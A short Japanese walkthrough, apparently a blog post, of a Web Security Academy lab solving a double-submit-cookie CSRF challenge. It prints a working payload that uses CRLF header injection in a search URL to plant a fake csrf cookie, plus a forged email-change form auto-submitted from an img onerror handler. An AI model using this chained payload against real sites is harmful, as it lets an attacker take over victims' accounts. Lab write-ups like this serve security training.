Hello there, ('ω')ノ
トークンがCookieに複製されるCSRFを。
このラボのメール変更機能はCSRFに対して脆弱で。
エクスプロイトサーバでCSRF攻撃をして電子メールアドレスを変更せよと。
まずは、動作確認を。
リクエストボディにcsrfは見当たらず。
ログインすると。
Cookieにcsrfが。
メールアドレスの変更を。
リクエストをリピータへ。
一つのcsrfのトークンを削除してSendするとエラーが。
csrf=p40x2HNPUn4z7GJMtWBlv67zfZzZ14LV
もう一つのcsrfのパラメータを削除してSendすると別のエラーが。
両方のcsrfを下記に変更してもエラーが。
csrf=p40x2HNPUn4z7GJMtWBlv67zfZzZ14L1
再度、検索して。
リクエストをCSRF PoCへ。
オプションを設定して。
下記のように変更したいメールアドレスとcsrfを設定してRegenerateを。
email=hack%40mail.com&csrf=fake
検索のリクエストのURLをコピーしておいて。
https://ac1c1fc91f958468801c2527009500a8.web-security-academy.net/?search=test
スクリプトブロックに下記のコードを追加してCopy HTMLを。
<img src="https://ac1c1fc91f958468801c2527009500a8.web-security-academy.net/?search=test%0d%0aSet-Cookie:%20csrf=fake" onerror="document.forms[0].submit();"/>
ちなみに追加したコードをデコードすると。
search=test%0d%0aSet-Cookie:%20csrf=fake
コピーしたHTMLを貼り付けて、保存すると。
クリアできた。
View exploitするとコピーしたHTMLを確認することができて。
メールアドレスも変更されたことが確認できて。
Best regards, (^^ゞ